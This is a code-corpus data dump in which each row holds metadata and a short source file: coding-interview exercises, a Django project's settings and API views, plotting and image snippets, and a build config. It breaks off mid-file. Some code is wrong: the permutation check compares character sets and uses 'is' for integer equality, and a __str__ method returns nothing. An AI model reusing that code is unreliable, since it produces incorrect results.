hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
967f1bd43c77328bcdadd29ca902289cad671ab3 | 748 | py | Python | crackingcointsolutions/chapter1/excersisetwo.py | igoroya/igor-oya-solutions-cracking-coding-interview | 12173d327662d5a684929a2ef44e96658f156425 | [
"MIT"
] | null | null | null | crackingcointsolutions/chapter1/excersisetwo.py | igoroya/igor-oya-solutions-cracking-coding-interview | 12173d327662d5a684929a2ef44e96658f156425 | [
"MIT"
] | null | null | null | crackingcointsolutions/chapter1/excersisetwo.py | igoroya/igor-oya-solutions-cracking-coding-interview | 12173d327662d5a684929a2ef44e96658f156425 | [
"MIT"
] | null | null | null | '''
Created on Aug 8, 2017
Check permutation: Given two strings, write a method to decide if one is a permutation of the other
Things to learn:
- a python set orders set content
- in a set, one uses == to compare same content
@author: igoroya
'''
def check_string_permuntation(str1, str2):
if len(str1) is not len(str2):
return False
strset1 = {i for i in str1}
strset2 = {i for i in str2}
if strset1 == strset2:
return True
else:
return False
if __name__ == '__main__':
str1 = 'aeiou'
str2 = 'aeiuo'
str3 = 'pepe'
str4 = 'aeiouaeiou'
print(check_string_permuntation(str1, str2))
print(check_string_permuntation(str1, str3))
print(check_string_permuntation(str1, str4))
| 23.375 | 99 | 0.667112 | 107 | 748 | 4.514019 | 0.53271 | 0.091097 | 0.190476 | 0.223602 | 0.271222 | 0 | 0 | 0 | 0 | 0 | 0 | 0.044092 | 0.241979 | 748 | 31 | 100 | 24.129032 | 0.80776 | 0.319519 | 0 | 0.117647 | 0 | 0 | 0.064 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.058824 | false | 0 | 0 | 0 | 0.235294 | 0.176471 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
96923fd582147493f79df39ee859ca53fe9a69e5 | 2,202 | py | Python | SIPSim/Commands/OTU_table.py | arischwartz/test | 87a8306a294f59b0eef992529ce900cea876c605 | [
"MIT"
] | 2 | 2019-03-15T09:46:48.000Z | 2019-06-05T18:16:39.000Z | SIPSim/Commands/OTU_table.py | arischwartz/test | 87a8306a294f59b0eef992529ce900cea876c605 | [
"MIT"
] | 1 | 2020-11-01T23:18:10.000Z | 2020-11-01T23:18:10.000Z | SIPSim/Commands/OTU_table.py | arischwartz/test | 87a8306a294f59b0eef992529ce900cea876c605 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
"""
OTU_table: simulate OTUs for gradient fractions
Usage:
OTU_table [options] <BD_KDE> <communities> <fractions>
OTU_table -h | --help
OTU_table --version
Options:
<BD_KDE> KDE object of BD value distributions.
('-' if from STDIN)
<communities> Simulated community abundance table file.
<fractions> Simulated gradient fraction file.
--abs=<aa> Absolute abundance of all taxa in the community.
[default: 1e5]
--np=<np> Number of parallel processes.
[default: 1]
--max=<m> Max Number of BD values to bin at once.
Use smaller values to prevent memory errors.
[default: 10000000]
--quiet Limit STDERR output.
--version Show version.
--debug Debug mode.
-h --help Show this screen.
Description:
Create an OTU table of simulated OTUs for each fraction in >=1 CsCl gradient.
Basically, the location within the gradient (i.e., buoyant density)
of each DNA fragment associated with each taxon is determined, and
then binned into simulated gradient fractions that span certain
buoyant density ranges.
The abundance of each OTU in each fraction is based on:
1) The absolute abundance of the OTU in the pre-gradient community.
2) The G+C content of each simulated fragment of the taxon.
3) The fragment length of each simulated fragment (influences diffusion).
Output
------
A tab-delimited OTU table written to STDOUT.
Table column descriptions:
library : library_ID (gradient_ID)
fraction : fraction_ID
BD_XXX : buoyant density values
count : total number of DNA fragments for the taxon in the gradient fraction
rel_abund : relative abundance (0-1) for the taxon in the gradient fraction
"""
# import
## batteries
from docopt import docopt
import os, sys
## application libraries
from SIPSim import OTU_Table
def opt_parse(args=None):
if args is None:
args = docopt(__doc__, version='0.1')
else:
args = docopt(__doc__, version='0.1', argv=args)
OTU_Table.main(args)
| 31.457143 | 80 | 0.658038 | 292 | 2,202 | 4.886986 | 0.472603 | 0.044849 | 0.016819 | 0.032235 | 0.075683 | 0.075683 | 0.044849 | 0 | 0 | 0 | 0 | 0.013068 | 0.270209 | 2,202 | 69 | 81 | 31.913043 | 0.874922 | 0.863306 | 0 | 0 | 0 | 0 | 0.020833 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.333333 | 0 | 0.444444 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
969e7c1ce4e9779511f9255cbe2a585370344d5d | 657 | py | Python | python/itypes/dataset/key.py | eddy-ilg/itypes | eaf1c4a86576c77caa34148c0fdc6b2e012119ff | [
"MIT"
] | null | null | null | python/itypes/dataset/key.py | eddy-ilg/itypes | eaf1c4a86576c77caa34148c0fdc6b2e012119ff | [
"MIT"
] | null | null | null | python/itypes/dataset/key.py | eddy-ilg/itypes | eaf1c4a86576c77caa34148c0fdc6b2e012119ff | [
"MIT"
] | null | null | null | #!/usr/bin/env python3
class Key:
def __init__(self, group_name=None, item_name=None, variable_name=None):
self._group_name = group_name
self._item_name = item_name
self._variable_name = variable_name
def group_name(self):
return self._group_name
def item_name(self):
return self._item_name
def variable_name(self):
return self._variable_name
def __str__(self):
path = [self._group_name]
if self._item_name is not None:
path.append(self._item_name)
if self._variable_name is not None:
path.append(self._variable_name) | 28.565217 | 76 | 0.637747 | 88 | 657 | 4.318182 | 0.238636 | 0.147368 | 0.136842 | 0.142105 | 0.142105 | 0.142105 | 0.142105 | 0 | 0 | 0 | 0 | 0.002123 | 0.283105 | 657 | 23 | 77 | 28.565217 | 0.804671 | 0.031963 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.294118 | false | 0 | 0 | 0.176471 | 0.529412 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 2 |
96b025c2dd8d832b862903ff9c13f820e80e2899 | 172 | py | Python | Desafios/ex012/ex012.py | Jose-Wilson/Python | d7dc9f16b53708089c9e2659568220b7869bab99 | [
"MIT"
] | null | null | null | Desafios/ex012/ex012.py | Jose-Wilson/Python | d7dc9f16b53708089c9e2659568220b7869bab99 | [
"MIT"
] | null | null | null | Desafios/ex012/ex012.py | Jose-Wilson/Python | d7dc9f16b53708089c9e2659568220b7869bab99 | [
"MIT"
] | null | null | null | preço = float(input('Qual é o preço do produto? '))
novo = preço - (preço * 5 / 100)
print(f'O produto que custava R${preço}. \nNa promoção de 5% vai custar R${novo:.2f}')
| 43 | 86 | 0.656977 | 31 | 172 | 3.645161 | 0.709677 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.042254 | 0.174419 | 172 | 3 | 87 | 57.333333 | 0.753521 | 0 | 0 | 0 | 0 | 0.333333 | 0.598837 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0.333333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
96b373de3b9e2b724fcd05a2638ce75eaa2b54f0 | 153 | py | Python | tutorials/W1D5_DimensionalityReduction/solutions/W1D5_Tutorial4_Solution_7ac06f29.py | liuxiaomiao123/NeuroMathAcademy | 16a7969604a300bf9fbb86f8a5b26050ebd14c65 | [
"CC-BY-4.0"
] | 2 | 2020-07-03T04:39:09.000Z | 2020-07-12T02:08:31.000Z | tutorials/W1D5_DimensionalityReduction/solutions/W1D5_Tutorial4_Solution_7ac06f29.py | NinaHKivanani/course-content | 3c91dd1a669cebce892486ba4f8086b1ef2e1e49 | [
"CC-BY-4.0"
] | 1 | 2020-06-22T22:57:03.000Z | 2020-06-22T22:57:03.000Z | tutorials/W1D5_DimensionalityReduction/solutions/W1D5_Tutorial4_Solution_7ac06f29.py | NinaHKivanani/course-content | 3c91dd1a669cebce892486ba4f8086b1ef2e1e49 | [
"CC-BY-4.0"
] | 1 | 2021-08-06T08:05:01.000Z | 2021-08-06T08:05:01.000Z | X = X[:2000,:]
labels = labels[:2000]
score = pca_model.transform(X)
with plt.xkcd():
visualize_components(score[:,0],score[:,1],labels)
plt.show() | 19.125 | 52 | 0.666667 | 23 | 153 | 4.347826 | 0.652174 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.074074 | 0.117647 | 153 | 8 | 53 | 19.125 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
96b3e28dec70d55b38acdf14f36dcdc59a10066d | 159 | py | Python | week_06/blur.py | DaviNakamuraCardoso/cs50 | 2081abb6fa1131184b07a68ed3b07d538c3ba3dd | [
"MIT"
] | 2 | 2020-08-05T23:27:24.000Z | 2020-08-12T01:52:29.000Z | week_06/blur.py | DaviNakamuraCardoso/cs50 | 2081abb6fa1131184b07a68ed3b07d538c3ba3dd | [
"MIT"
] | null | null | null | week_06/blur.py | DaviNakamuraCardoso/cs50 | 2081abb6fa1131184b07a68ed3b07d538c3ba3dd | [
"MIT"
] | 1 | 2020-08-07T04:50:09.000Z | 2020-08-07T04:50:09.000Z | from PIL import Image, ImageFilter
before = Image.open("/home/davi/Downloads/melado.jpg")
after = before.filter(ImageFilter.BLUR)
after.save("blurmelado.bmp") | 31.8 | 54 | 0.779874 | 22 | 159 | 5.636364 | 0.818182 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.075472 | 159 | 5 | 55 | 31.8 | 0.843537 | 0 | 0 | 0 | 0 | 0 | 0.28125 | 0.19375 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.25 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
96b9ec10cfe33325a91bf4f65d46bd67ee6cd676 | 540 | gyp | Python | src/shoco.gyp | lovell/shorter | e322f0837ceb074bf92656c0460299eabc10e0b1 | [
"Apache-2.0"
] | 30 | 2016-12-29T22:13:42.000Z | 2021-12-09T04:12:44.000Z | src/shoco.gyp | lovell/shorter | e322f0837ceb074bf92656c0460299eabc10e0b1 | [
"Apache-2.0"
] | 5 | 2017-07-10T15:50:20.000Z | 2021-08-23T10:59:53.000Z | src/shoco.gyp | lovell/shorter | e322f0837ceb074bf92656c0460299eabc10e0b1 | [
"Apache-2.0"
] | 6 | 2016-12-29T23:59:14.000Z | 2022-01-23T23:55:35.000Z | {
'targets': [{
'target_name': 'shoco',
'type': 'static_library',
'sources': ['shoco/shoco.c'],
'cflags': [
'-std=c99',
'-fexceptions',
'-Wall',
'-march=native',
'-Ofast'
],
'xcode_settings': {
'OTHER_CFLAGS': [
'-std=c99',
'-fexceptions',
'-Wall',
'-march=native',
'-Ofast'
]
},
'msvs_settings': {
'VCCLCompilerTool': {
'ExceptionHandling': 1,
'DisableSpecificWarnings': ['4244']
}
}
}]
}
| 18 | 43 | 0.442593 | 37 | 540 | 6.324324 | 0.702703 | 0.076923 | 0.102564 | 0.196581 | 0.367521 | 0.367521 | 0.367521 | 0.367521 | 0 | 0 | 0 | 0.025714 | 0.351852 | 540 | 29 | 44 | 18.62069 | 0.642857 | 0 | 0 | 0.344828 | 0 | 0 | 0.47037 | 0.042593 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
96bb508294da6e43de194388233605a2b4dda3c7 | 520 | py | Python | BBC Microbits/Code/img_diagonal.py | TuxStory/Python3 | 4c1b2291d1613b32aa36b62b0b881ea40b423cce | [
"MIT"
] | null | null | null | BBC Microbits/Code/img_diagonal.py | TuxStory/Python3 | 4c1b2291d1613b32aa36b62b0b881ea40b423cce | [
"MIT"
] | null | null | null | BBC Microbits/Code/img_diagonal.py | TuxStory/Python3 | 4c1b2291d1613b32aa36b62b0b881ea40b423cce | [
"MIT"
] | null | null | null | from microbit import *
img = Image(5,5)
for j in range(10):
for i in range(5):
img.set_pixel(i,i,9)
display.show(img)
sleep(500)
img.set_pixel(i,i,0)
display.clear()
for i in range(3):
img.set_pixel(3-i,3-i,9)
display.show(img)
sleep(500)
img.set_pixel(3-i,3-i,0)
display.clear()
'''
test = [1,4,2,2,4,3,4,0,2,1,0,4,3]
for i in test():
img.set_pixel((test[2]),(test[5]),9)
display.show(img)
sleep(100)
display.clear()
''' | 20 | 40 | 0.540385 | 97 | 520 | 2.845361 | 0.278351 | 0.108696 | 0.199275 | 0.163043 | 0.442029 | 0.318841 | 0.318841 | 0.253623 | 0.253623 | 0.253623 | 0 | 0.102632 | 0.269231 | 520 | 26 | 41 | 20 | 0.623684 | 0 | 0 | 0.4 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.066667 | 0 | 0.066667 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
7366d76b4a41725d1db70467daffafb5d26a3f70 | 1,207 | py | Python | src/muses/settings.py | Aincient/cleo | 933ef372fa7847d943206d72bfb03c201dbafbd6 | [
"Apache-2.0"
] | null | null | null | src/muses/settings.py | Aincient/cleo | 933ef372fa7847d943206d72bfb03c201dbafbd6 | [
"Apache-2.0"
] | null | null | null | src/muses/settings.py | Aincient/cleo | 933ef372fa7847d943206d72bfb03c201dbafbd6 | [
"Apache-2.0"
] | 3 | 2018-10-01T12:04:36.000Z | 2021-01-07T09:30:50.000Z | from .conf import get_setting
__all__ = (
'CONFIG',
'DEBUG',
'EXPORTER_PLUGIN_MODULE_NAME',
'FAIL_ON_ERRORS_IN_EXPORTER_PLUGINS',
'FAIL_ON_ERRORS_IN_IMPORTER_PLUGINS',
'FAIL_ON_MISSING_EXPORTER_PLUGINS',
'FAIL_ON_MISSING_IMPORTER_PLUGINS',
'IMPORTER_PLUGIN_MODULE_NAME',
)
# **************************************************************
# **************************************************************
# *************************** Core *****************************
# **************************************************************
# **************************************************************
IMPORTER_PLUGIN_MODULE_NAME = get_setting('IMPORTER_PLUGIN_MODULE_NAME')
EXPORTER_PLUGIN_MODULE_NAME = get_setting('EXPORTER_PLUGIN_MODULE_NAME')
CONFIG = get_setting('CONFIG')
DEBUG = get_setting('DEBUG')
FAIL_ON_ERRORS_IN_IMPORTER_PLUGINS = get_setting(
'FAIL_ON_ERRORS_IN_IMPORTER_PLUGINS'
)
FAIL_ON_MISSING_IMPORTER_PLUGINS = get_setting(
'FAIL_ON_MISSING_IMPORTER_PLUGINS'
)
FAIL_ON_ERRORS_IN_EXPORTER_PLUGINS = get_setting(
'FAIL_ON_ERRORS_IN_EXPORTER_PLUGINS'
)
FAIL_ON_MISSING_EXPORTER_PLUGINS = get_setting(
'FAIL_ON_MISSING_EXPORTER_PLUGINS'
)
| 30.175 | 72 | 0.592378 | 119 | 1,207 | 5.294118 | 0.168067 | 0.114286 | 0.152381 | 0.133333 | 0.688889 | 0.55873 | 0.288889 | 0.234921 | 0.133333 | 0 | 0 | 0 | 0.095278 | 1,207 | 39 | 73 | 30.948718 | 0.576923 | 0.260149 | 0 | 0 | 0 | 0 | 0.444194 | 0.419391 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 2 |
7376cda299e3b466a808b725b51c41fb8223052c | 958 | py | Python | api/views/enrolled_course.py | evan-rusin/fly-project | 8afc697f2a9fb63317cca2763ed0ed76f9ef2ead | [
"BSD-2-Clause"
] | 15 | 2016-11-17T08:34:52.000Z | 2021-11-12T07:08:58.000Z | api/views/enrolled_course.py | evan-rusin/fly-project | 8afc697f2a9fb63317cca2763ed0ed76f9ef2ead | [
"BSD-2-Clause"
] | 137 | 2015-12-07T19:48:03.000Z | 2016-10-11T20:19:33.000Z | api/views/enrolled_course.py | evan-rusin/fly-project | 8afc697f2a9fb63317cca2763ed0ed76f9ef2ead | [
"BSD-2-Clause"
] | 11 | 2016-10-21T22:43:54.000Z | 2021-08-28T14:41:02.000Z | import django_filters
from django.contrib.auth.models import User, Group
from rest_framework import viewsets, mixins
from rest_framework.response import Response
from rest_framework.authentication import TokenAuthentication
from rest_framework import filters
from api.pagination import LargeResultsSetPagination
from api.permissions import IsUser
from api.serializers import EnrolledCourseSerializer
from api.models import EnrolledCourse
class EnrolledCourseFilter(django_filters.FilterSet):
class Meta:
model = EnrolledCourse
fields = ['id', 'created', 'user', 'course', 'finished', 'is_finished', 'final_mark',]
class EnrolledCourseViewSet(viewsets.ModelViewSet):
queryset = EnrolledCourse.objects.all()
serializer_class = EnrolledCourseSerializer
pagination_class = LargeResultsSetPagination
authentication_classes = (TokenAuthentication,)
permission_classes = (IsUser,)
filter_class = EnrolledCourseFilter
| 36.846154 | 94 | 0.806889 | 96 | 958 | 7.916667 | 0.479167 | 0.042105 | 0.089474 | 0.060526 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.129436 | 958 | 25 | 95 | 38.32 | 0.911271 | 0 | 0 | 0 | 0 | 0 | 0.050104 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.47619 | 0 | 0.904762 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
7383de42b52503daffb8a04786191272cb7e5661 | 1,930 | py | Python | dl_multi/metrics/scores.py | wbrandenburger/MTPIA | 02c773ce60b7efd5b15f270f047a6da5a8f00b7e | [
"MIT"
] | 1 | 2020-04-14T10:19:37.000Z | 2020-04-14T10:19:37.000Z | dl_multi/metrics/scores.py | wbrandenburger/MTPIA | 02c773ce60b7efd5b15f270f047a6da5a8f00b7e | [
"MIT"
] | null | null | null | dl_multi/metrics/scores.py | wbrandenburger/MTPIA | 02c773ce60b7efd5b15f270f047a6da5a8f00b7e | [
"MIT"
] | null | null | null | # ===========================================================================
# scores.py ---------------------------------------------------------------
# ===========================================================================
# class -------------------------------------------------------------------
# ---------------------------------------------------------------------------
class Scores():
# method --------------------------------------------------------------
# -----------------------------------------------------------------------
def __init__(
self,
number=1,
logger=None
):
self._len = number
self._logger = logger
# method --------------------------------------------------------------
# -----------------------------------------------------------------------
def __len__(self):
return self._len
# method --------------------------------------------------------------
# -----------------------------------------------------------------------
def __iter__(self):
self._index = -1
return self
# method --------------------------------------------------------------
# -----------------------------------------------------------------------
def __next__(self):
if self._index < self._len-1:
self._index += 1
return self
else:
raise StopIteration
# method --------------------------------------------------------------
# -----------------------------------------------------------------------
def __repr__(self):
pass
# method --------------------------------------------------------------
# -----------------------------------------------------------------------
def logger(self, log_str):
if self._logger is not None:
self._logger.info(log_str)
return log_str | 38.6 | 77 | 0.187565 | 78 | 1,930 | 4.230769 | 0.346154 | 0.163636 | 0.060606 | 0.09697 | 0.121212 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002528 | 0.180311 | 1,930 | 50 | 78 | 38.6 | 0.206068 | 0.644041 | 0 | 0.08 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.24 | false | 0.04 | 0 | 0.04 | 0.44 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
73956be079ddebb8d05372c926665d62e5b38c15 | 4,871 | py | Python | settings/production_settings.py | paulgirmes/P13 | 6129d4639a3d190631c5548c7c6f1c5a53e13161 | [
"MIT"
] | null | null | null | settings/production_settings.py | paulgirmes/P13 | 6129d4639a3d190631c5548c7c6f1c5a53e13161 | [
"MIT"
] | 1 | 2022-03-12T00:49:28.000Z | 2022-03-12T00:49:28.000Z | settings/production_settings.py | paulgirmes/P13 | 6129d4639a3d190631c5548c7c6f1c5a53e13161 | [
"MIT"
] | null | null | null | """
Django settings for CC_ERP project.
Generated by 'django-admin startproject' using Django 3.0.8.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import json
import os
import sentry_sdk
from sentry_sdk.integrations.django import DjangoIntegration
from google.oauth2 import service_account
import django_heroku
sentry_sdk.init(
dsn=os.environ.get("SENTRY_DSN"),
integrations=[DjangoIntegration()],
traces_sample_rate=1.0,
# If you wish to associate users to errors (assuming you are using
# django.contrib.auth) you may enable sending PII data.
send_default_pii=True
)
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = False
ALLOWED_HOSTS = [".herokuapp.com", "localhost", "127.0.0.1"]
# settings for email sending : smtp server...
EMAIL_BACKEND = "django.core.mail.backends.smtp.EmailBackend"
EMAIL_HOST = "smtp.gmail.com"
EMAIL_PORT = 587
EMAIL_HOST_USER = os.environ.get("EMAIL_HOST_USER")
EMAIL_HOST_PASSWORD = os.environ.get("EMAIL_HOST_PASSWORD")
EMAIL_USE_TLS = True
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
"debug_toolbar",
"frontpage.apps.FrontpageConfig",
"auth_access_admin.apps.AuthAccessAdminConfig",
"day_to_day.apps.DayToDayConfig",
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
"debug_toolbar.middleware.DebugToolbarMiddleware",
]
ROOT_URLCONF = 'CC_ERP.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
